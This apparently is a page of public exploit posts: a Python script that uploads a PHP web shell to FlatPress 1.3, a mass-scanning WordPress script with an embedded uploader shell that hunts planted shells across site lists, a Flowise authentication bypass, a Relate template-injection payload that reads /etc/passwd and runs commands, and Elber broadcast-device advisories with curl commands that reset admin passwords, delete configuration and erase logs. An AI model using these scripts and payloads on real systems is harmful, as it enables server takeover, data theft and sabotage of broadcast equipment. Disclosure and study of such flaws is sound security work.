<pre><code># Exploit Title: FlatPress v1.3 - Remote Command Execution<br /># Discovered by: Ahmet Ümit BAYRAM<br /># Discovered Date: 19.04.2024<br /># Vendor Homepage: https://www.flatpress.org<br /># Software Link: https://github.com/flatpressblog/flatpress/archive/1.3.zip<br /># Tested Version: 1.3 (latest)<br /># Tested on: MacOS<br /><br />import requests<br />import time<br />import random<br />import string<br /><br />def random_string(length=5):<br /> """Rastgele bir string oluşturur."""<br /> letters = string.ascii_lowercase<br /> return ''.join(random.choice(letters) for i in range(length))<br /><br />def login_and_upload(base_url, username, password):<br /> filename = random_string() + ".php"<br /> login_url = f"http://{base_url}/login.php"<br /> upload_url = f"http://{base_url}/admin.php?p=uploader&action=default"<br /><br /> with requests.Session() as session:<br /> # Exploiting<br /> print("Exploiting...")<br /> time.sleep(1)<br /><br /> # Giriş yapma denemesi<br /> login_data = {<br /> 'user': username,<br /> 'pass': password,<br /> 'submit': 'Login'<br /> }<br /> print("Logging in...")<br /> response = session.post(login_url, data=login_data)<br /> time.sleep(1)<br /><br /> if "Logout" in response.text:<br /> print("Login Successful!")<br /> else:<br /> print("Login Failed!")<br /> print(response.text)<br /> return<br /><br /> # Dosya yükleme denemesi<br /> print("Shell uploading...")<br /> time.sleep(1)<br /><br /> # Form verileri ve dosyalar<br /> files = {<br /> 'upload[]': (filename, '<?=`$_GET[0]`?>', 'text/php'),<br /> }<br /> form_data = {<br /> '_wpnonce': '9e0ed04260',<br /> '_wp_http_referer': '/admin.php?p=uploader',<br /> 'upload': 'Upload'<br /> }<br /><br /> response = session.post(upload_url, files=files, data=form_data)<br /><br /> if "File(s) uploaded" in response.text or "Upload" in response.text:<br /> shell_url = f"http://{base_url}/fp-content/attachs/{filename}"<br /> print(f"Your Shell is Ready: {shell_url}")<br /> time.sleep(1)<br /> print(f"Shell Usage: {shell_url}?0=command")<br /> else:<br /> print("Exploit Failed!")<br /> print(response.status_code, response.text)<br /><br /># Örnek kullanım: python script.py siteadi.com username password<br />if __name__ == "__main__":<br /> import sys<br /> if len(sys.argv) != 4:<br /> print("Usage: script.py <base_url> <username> <password>")<br /> else:<br /> base_url, username, password = sys.argv[1:]<br /> login_and_upload(base_url, username, password)<br /><br /></code></pre>
<pre><code># Exploit Title: Wordpress Plugin Background Image Cropper v1.2 - Remote<br />Code Execution<br /># Date: 2024-04-16<br /># Author: Milad Karimi (Ex3ptionaL)<br /># Contact: miladgrayhat@gmail.com<br /># Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL<br /># Vendor Homepage: https://wordpress.org<br /># Software Link: https://wordpress.org/plugins/background-image-cropper/<br /># Version: 1.2<br /># Category : webapps<br /># Tested on: windows 10 , firefox<br /><br />import sys , requests, re<br />from multiprocessing.dummy import Pool<br />from colorama import Fore<br />from colorama import init<br />init(autoreset=True)<br />shell = """<?php echo "Ex3ptionaL"; echo "<br>".php_uname()."<br>"; echo<br />"<form method='post' enctype='multipart/form-data'> <input type='file'<br />name='zb'><input type='submit' name='upload' value='upload'></form>";<br />if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'],<br />$_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to<br />Upload."; } } ?>"""<br />requests.urllib3.disable_warnings()<br />headers = {'Connection': 'keep-alive',<br /> 'Cache-Control': 'max-age=0',<br /> 'Upgrade-Insecure-Requests': '1',<br /> 'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A<br />Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0<br />Chrome/60.0.3112.107 Moblie Safari/537.36',<br /> 'Accept':<br />'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',<br /> 'Accept-Encoding': 'gzip, deflate',<br /> 'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',<br /> 'referer': 'www.google.com'}<br />try:<br /> target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]<br />except IndexError:<br /> path = str(sys.argv[0]).split('\\')<br /> exit('\n [!] Enter <' + path[len(path) - 1] + '> <sites.txt>')<br /><br />def URLdomain(site):<br /> if site.startswith("http://") :<br /> site = site.replace("http://","")<br /> elif site.startswith("https://") :<br /> site = site.replace("https://","")<br /> else :<br /> pass<br /> pattern = re.compile('(.*)/')<br /> while re.findall(pattern,site):<br /> sitez = re.findall(pattern,site)<br /> site = sitez[0]<br /> return site<br /><br /><br />def FourHundredThree(url):<br /> try:<br /> url = 'http://' + URLdomain(url)<br /> check =<br />requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers,<br />allow_redirects=True,timeout=15)<br /> if 'enctype="multipart/form-data" name="uploader"<br />id="uploader"><input type="file" name="file" size="50"><input name="_upl"<br />type="submit" id="_upl" value="Upload' in check.content:<br /> print ' -| ' + url + ' --> {}[Succefully]'.format(fg)<br /> open('Shells.txt', 'a').write(url +<br />'/wp-content/plugins/background-image-cropper/ups.php\n')<br /> else:<br /> url = 'https://' + URLdomain(url)<br /> check =<br />requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers,<br />allow_redirects=True,verify=False ,timeout=15)<br /> if 'enctype="multipart/form-data" name="uploader"<br />id="uploader"><input type="file" name="file" size="50"><input name="_upl"<br />type="submit" id="_upl" value="Upload' in check.content:<br /> print ' -| ' + url + ' --> {}[Succefully]'.format(fg)<br /> open('Shells.txt', 'a').write(url +<br />'/wp-content/plugins/background-image-cropper/ups.php\n')<br /> else:<br /> print ' -| ' + url + ' --> {}[Failed]'.format(fr)<br /> except :<br /> print ' -| ' + url + ' --> {}[Failed]'.format(fr)<br /><br />mp = Pool(150)<br />mp.map(FourHundredThree, target)<br />mp.close()<br />mp.join()<br /><br />print '\n [!] {}Saved in LOL.txt'.format(fc)<br /></code></pre>
<pre><code># Exploit Title: Flowise 1.6.5 - Authentication Bypass<br /># Date: 17-April-2024<br /># Exploit Author: Maerifat Majeed<br /># Vendor Homepage: https://flowiseai.com/<br /># Software Link: https://github.com/FlowiseAI/Flowise/releases<br /># Version: 1.6.5<br /># Tested on: mac-os<br /># CVE : CVE-2024-31621<br /><br />The flowise version <= 1.6.5 is vulnerable to authentication bypass<br />vulnerability.<br />The code snippet<br /><br />this.app.use((req, res, next) => {<br />> if (req.url.includes('/api/v1/')) {<br />> whitelistURLs.some((url) => req.url.includes(url)) ?<br />> next() : basicAuthMiddleware(req, res, next)<br />> } else next()<br />> })<br /><br /><br />puts authentication middleware for all the endpoints with path /api/v1<br />except a few whitelisted endpoints. But the code does check for the case<br />sensitivity hence only checks for lowercase /api/v1 . Anyone modifying the<br />endpoints to uppercase like /API/V1 can bypass the authentication.<br /><br />*POC:*<br />curl http://localhost:3000/Api/v1/credentials<br />For seamless authentication bypass. Use burpsuite feature Match and replace<br />rules in proxy settings. Add rule Request first line api/v1 ==> API/V1<br /><br /></code></pre>
<pre><code># Exploit Title: Relate Learning And Teaching system Version before 2024.1 SSTI(Markup Sandbox function) lead to RCE<br /># Date: 19/04/2024<br /># Exploit Author: kai6u<br /># Vendor Homepage: https://github.com/inducer/<br /># Software Link: https://github.com/inducer/relate<br /># Affected Version:before 2024.1 (https://github.com/inducer/relate/commit/2fdbd4480a2d0a45c746639be244a61a0d4112b6)<br /># Fixed Version:2024.1 (https://github.com/inducer/relate/commit/d9fa7dcb84b8e5a64ce78ced4f56cdd61c0d59aa)<br /># Tested on: Ubuntu 22.04<br /># Summary:<br />SSTI Markup Sandbox function of Relate Learning And Teaching system<br /><br /># Description:<br /><br />* 【Prerequisite】<br /> * The attacker has stolen the privilege to use Markup Sandbox. For example, attacker is logged in as an course administrator.<br /><br />* SSTI is in the `Markup Sandbox` feature, which allows user to check Mark Down contents before publish.<br /><br />1) First, the attacker uses the Markup Sandbox feature to plant the following payload.<br /> * Payload:<br /> * `{{ 'abc'.__class__.__base__.__subclasses__()[111].__subclasses__()[0].__subclasses__()[0]('/etc/passwd').read() }}`<br /> * Note that the subclasses index number in the payload depends on the python version, so it must be changed depending on the environment.<br /><br />2) Click an Preview including the above payload.<br />* Then you will see that the contents of the `/etc/passwd` file are output at the Content Preview block.<br />* This is identified as an LFI vulnerability because it is a file that should not be read from the application side.<br /><br />3) Next, the attacker modifies the above payload to execute arbitrary commands by changing the subclasses index number to the number of popen.<br /> * Payload:<br /> * `{{ 'abc'.__class__.__base__.__subclasses__()[210]('whoami',shell=True,stdout=-1).communicate()[0].strip() }}`<br /><br />4) Click an Preview including the above payload.<br /><br />* If you check the results, you will see that `ubuntu` is displayed, which is the result of executing the whoami command.<br />* This is classified as an RCE vulnerability and is very dangerous because it is possible to hijack the server directly from the application side.<br />* An attacker can use this feature to execute reverse shell.<br /><br /># References<br />https://book.hacktricks.xyz/v/jp/pentesting-web/ssti-server-side-template-injection<br /><br /><br /></code></pre>
<pre><code><br />Elber Wayber Analog/Digital Audio STL 4.00 Device Config<br /><br /><br />Vendor: Elber S.r.l.<br />Product web page: https://www.elber.it<br />Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501)<br /> Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516)<br /> Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516)<br /> Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501)<br /> Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350)<br /> Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342)<br /> Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131)<br /><br />Summary: Wayber II is the name of an analogue/digital microwave link<br />able to transport a Mono or a MPX stereo signal from studio to audio<br />transmitter. Compact and reliable, it features very high quality and<br />modern technology both in signal processing and microwave section leading<br />to outstanding performances.<br /><br />Desc: The device suffers from an unauthenticated device configuration and<br />client-side hidden functionality disclosure.<br /><br />Tested on: NBFM Controller<br /> embOS/IP<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2024-5823<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5823.php<br /><br /><br />18.08.2023<br /><br />--<br /><br /><br /># Config fan<br />$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='<br />Configuration applied<br /><br /># Delete config<br />$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'<br />File delete successfully<br /><br /># Launch upgrade<br />$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'<br />Upgrade launched Successfully<br /><br /># Log erase<br />$ curl 'http://TARGET/json_data/erase_log.js?until=-2'<br />Logs erased<br /><br /># Until:<br /># =0 ALL<br /># =-2 Yesterday<br /># =-8 Last week<br /># =-15 Last two weeks<br /># =-22 Last three weeks<br /># =-31 Last month<br /><br /># Set RX config<br />$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'<br />RX Config Applied Successfully<br /><br /># Show factory window and FPGA upload (Console)<br />> cleber_show_factory_wnd()<br /><br /># Etc.<br /></code></pre>
<pre><code><br />Elber Wayber Analog/Digital Audio STL 4.00 Authentication Bypass<br /><br /><br />Vendor: Elber S.r.l.<br />Product web page: https://www.elber.it<br />Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501)<br /> Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516)<br /> Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516)<br /> Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501)<br /> Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350)<br /> Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342)<br /> Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131)<br /><br />Summary: Wayber II is the name of an analogue/digital microwave link<br />able to transport a Mono or a MPX stereo signal from studio to audio<br />transmitter. Compact and reliable, it features very high quality and<br />modern technology both in signal processing and microwave section leading<br />to outstanding performances.<br /><br />Desc: The device suffers from an authentication bypass vulnerability through<br />a direct and unauthorized access to the password management functionality. The<br />issue allows attackers to bypass authentication by manipulating the set_pwd<br />endpoint that enables them to overwrite the password of any user within the<br />system. This grants unauthorized and administrative access to protected areas<br />of the application compromising the device's system security.<br /><br />--------------------------------------------------------------------------<br />/modules/pwd.html<br />------------------<br />50: function apply_pwd(level, pwd)<br />51: {<br />52: $.get("json_data/set_pwd", {lev:level, pass:pwd},<br />53: function(data){<br />54: //$.alert({title:'Operation',text:data});<br />55: show_message(data);<br />56: }).fail(function(error){<br />57: show_message('Error ' + error.status, 'error');<br />58: });<br />59: }<br /><br />--------------------------------------------------------------------------<br /><br />Tested on: NBFM Controller<br /> embOS/IP<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2024-5822<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5822.php<br /><br /><br />18.08.2023<br /><br />--<br /><br /><br />$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234<br /><br />Ref (lev param):<br /><br />Level 7 = SNMP Write Community (snmp_write_pwd)<br />Level 6 = SNMP Read Community (snmp_read_pwd)<br />Level 5 = Custom Password? hidden. (custom_pwd)<br />Level 4 = Display Password (display_pwd)?<br />Level 2 = Administrator Password (admin_pwd)<br />Level 1 = Super User Password (puser_pwd)<br />Level 0 = User Password (user_pwd)<br /></code></pre>
<pre><code><br />Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Device Config<br /><br /><br />Vendor: Elber S.r.l.<br />Product web page: https://www.elber.it<br />Affected version: 1.5.179 Revision 904<br /> 1.5.56 Revision 884<br /> 1.229 Revision 440<br /><br />Summary: ESE (Elber Satellite Equipment) product line, designed for the<br />high-end radio contribution and distribution market, where quality and<br />reliability are most important. The Elber IRD (Integrated Receiver Decoder)<br />ESE-01 offers a professional audio quality (and composite video) at an<br />excellent quality/price ratio. The development of digital satellite contribution<br />networks and the need to connect a large number of sites require a cheap<br />but reliable and performing satellite receiver with integrated decoder.<br /><br />Desc: The device suffers from an unauthenticated device configuration and<br />client-side hidden functionality disclosure.<br /><br />Tested on: NBFM Controller<br /> embOS/IP<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2024-5821<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5821.php<br /><br /><br />18.08.2023<br /><br />--<br /><br /><br /># Config fan<br />$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='<br />Configuration applied<br /><br /># Delete config<br />$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'<br />File delete successfully<br /><br /># Launch upgrade<br />$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'<br />Upgrade launched Successfully<br /><br /># Log erase<br />$ curl 'http://TARGET/json_data/erase_log.js?until=-2'<br />Logs erased<br /><br /># Until:<br /># =0 ALL<br /># =-2 Yesterday<br /># =-8 Last week<br /># =-15 Last two weeks<br /># =-22 Last three weeks<br /># =-31 Last month<br /><br /># Set RX config<br />$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'<br />RX Config Applied Successfully<br /><br /># Show factory window and FPGA upload (Console)<br />> cleber_show_factory_wnd()<br /><br /># Etc.<br /></code></pre>
<pre><code><br />Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Authentication Bypass<br /><br /><br />Vendor: Elber S.r.l.<br />Product web page: https://www.elber.it<br />Affected version: 1.5.179 Revision 904<br /> 1.5.56 Revision 884<br /> 1.229 Revision 440<br /><br />Summary: ESE (Elber Satellite Equipment) product line, designed for the<br />high-end radio contribution and distribution market, where quality and<br />reliability are most important. The Elber IRD (Integrated Receiver Decoder)<br />ESE-01 offers a professional audio quality (and composite video) at an<br />excellent quality/price ratio. The development of digital satellite contribution<br />networks and the need to connect a large number of sites require a cheap<br />but reliable and performing satellite receiver with integrated decoder.<br /><br />Desc: The device suffers from an authentication bypass vulnerability through<br />a direct and unauthorized access to the password management functionality. The<br />issue allows attackers to bypass authentication by manipulating the set_pwd<br />endpoint that enables them to overwrite the password of any user within the<br />system. This grants unauthorized and administrative access to protected areas<br />of the application compromising the device's system security.<br /><br />--------------------------------------------------------------------------<br />/modules/pwd.html<br />------------------<br />50: function apply_pwd(level, pwd)<br />51: {<br />52: $.get("json_data/set_pwd", {lev:level, pass:pwd},<br />53: function(data){<br />54: //$.alert({title:'Operation',text:data});<br />55: show_message(data);<br />56: }).fail(function(error){<br />57: show_message('Error ' + error.status, 'error');<br />58: });<br />59: }<br /><br />--------------------------------------------------------------------------<br /><br />Tested on: NBFM Controller<br /> embOS/IP<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2024-5820<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5820.php<br /><br /><br />18.08.2023<br /><br />--<br /><br /><br />$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234<br /><br />Ref (lev param):<br /><br />Level 7 = SNMP Write Community (snmp_write_pwd)<br />Level 6 = SNMP Read Community (snmp_read_pwd)<br />Level 5 = Custom Password? hidden. (custom_pwd)<br />Level 4 = Display Password (display_pwd)?<br />Level 2 = Administrator Password (admin_pwd)<br />Level 1 = Super User Password (puser_pwd)<br />Level 0 = User Password (user_pwd)<br /></code></pre>
<pre><code><br />Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Device Config<br /><br /><br />Vendor: Elber S.r.l.<br />Product web page: https://www.elber.it<br />Affected version: 0.01 Revision 0<br /><br />Summary: The REBLE610 features an accurate hardware design, absence of<br />internal cabling and full modularity. The unit is composed by a basic<br />chassis with 4 extractable boards which makes maintenance and critical<br />operations, like frequency modification, easy and efficient. The modular<br />approach has brought to the development of the digital processing module<br />(containing modulator, demodulator and data interface) and the RF module<br />(containing Transmitter, Receiver and channel filters). From an RF point<br />of view, the new transmission circuitry is able to guarantee around 1 Watt<br />with every modulation scheme, introducing, in addition, wideband precorrection<br />(up to 1GHz depending on frequency band).<br /><br />Desc: The device suffers from an unauthenticated device configuration and<br />client-side hidden functionality disclosure.<br /><br />Tested on: NBFM Controller<br /> embOS/IP<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2024-5819<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5819.php<br /><br /><br />18.08.2023<br /><br />--<br /><br /><br /># Config fan<br />$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='<br />Configuration applied<br /><br /># Delete config<br />$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'<br />File delete successfully<br /><br /># Launch upgrade<br />$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'<br />Upgrade launched Successfully<br /><br /># Log erase<br />$ curl 'http://TARGET/json_data/erase_log.js?until=-2'<br />Logs erased<br /><br /># Until:<br /># =0 ALL<br /># =-2 Yesterday<br /># =-8 Last week<br /># =-15 Last two weeks<br /># =-22 Last three weeks<br /># =-31 Last month<br /><br /># Set RX config<br />$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'<br />RX Config Applied Successfully<br /><br /># Show factory window and FPGA upload (Console)<br />> cleber_show_factory_wnd()<br /><br /># Etc.<br /></code></pre>
<pre><code><br />Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Authentication Bypass<br /><br /><br />Vendor: Elber S.r.l.<br />Product web page: https://www.elber.it<br />Affected version: 0.01 Revision 0<br /><br />Summary: The REBLE610 features an accurate hardware design, absence of<br />internal cabling and full modularity. The unit is composed by a basic<br />chassis with 4 extractable boards which makes maintenance and critical<br />operations, like frequency modification, easy and efficient. The modular<br />approach has brought to the development of the digital processing module<br />(containing modulator, demodulator and data interface) and the RF module<br />(containing Transmitter, Receiver and channel filters). From an RF point<br />of view, the new transmission circuitry is able to guarantee around 1 Watt<br />with every modulation scheme, introducing, in addition, wideband precorrection<br />(up to 1GHz depending on frequency band).<br /><br />Desc: The device suffers from an authentication bypass vulnerability through<br />a direct and unauthorized access to the password management functionality. The<br />issue allows attackers to bypass authentication by manipulating the set_pwd<br />endpoint that enables them to overwrite the password of any user within the<br />system. This grants unauthorized and administrative access to protected areas<br />of the application compromising the device's system security.<br /><br />--------------------------------------------------------------------------<br />/modules/pwd.html<br />------------------<br />50: function apply_pwd(level, pwd)<br />51: {<br />52: $.get("json_data/set_pwd", {lev:level, pass:pwd},<br />53: function(data){<br />54: //$.alert({title:'Operation',text:data});<br />55: show_message(data);<br />56: }).fail(function(error){<br />57: show_message('Error ' + error.status, 'error');<br />58: });<br />59: }<br /><br />--------------------------------------------------------------------------<br /><br />Tested on: NBFM Controller<br /> embOS/IP<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2024-5818<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5818.php<br /><br /><br />18.08.2023<br /><br />--<br /><br /><br />$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234<br /><br />Ref (lev param):<br /><br />Level 7 = SNMP Write Community (snmp_write_pwd)<br />Level 6 = SNMP Read Community (snmp_read_pwd)<br />Level 5 = Custom Password? hidden. (custom_pwd)<br />Level 4 = Display Password (display_pwd)?<br />Level 2 = Administrator Password (admin_pwd)<br />Level 1 = Super User Password (puser_pwd)<br />Level 0 = User Password (user_pwd)<br /></code></pre>